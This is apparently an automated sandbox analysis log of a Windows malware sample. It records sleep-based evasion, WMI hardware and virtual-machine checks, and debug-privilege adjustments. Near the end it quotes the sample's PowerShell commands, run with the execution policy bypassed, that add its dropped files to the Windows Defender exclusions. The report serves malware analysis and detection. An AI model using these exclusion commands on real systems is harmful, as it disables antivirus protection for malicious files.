Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1199985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1199875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 2676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7144	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Window / User API: threadDelayed 2226	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Window / User API: threadDelayed 7625	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6150
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3646
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6411
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3228
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6837
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2841

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe TID: 1860	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe TID: 5680	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe TID: 8112	Thread sleep time: -26747778906878833s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7256	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe TID: 7244	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836	Thread sleep time: -6456360425798339s >= -30000s

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59532	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59407	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 58969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 58860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 58735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 58614	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 58485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 58360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 58235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1199985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1199875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 59438	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: RegSvcs.exe, 00000003.00000002.3413577503.000001E3D1AD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWfigu%SystemRoot%\system32\mswsock.dllcKeyToken=b03f5f7f11d50a3a"
Source: btjxg.exe, 00000004.00000002.3366251779.000000000136E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}T
Source: btjxg.exe, 00000004.00000002.3388814639.000000001BDF3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\btjxg.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\btjxg.exe'
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\btjxg.exe'
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\btjxg.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\btjxg.exe'	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\AppData\Local\Temp\btjxg.exe

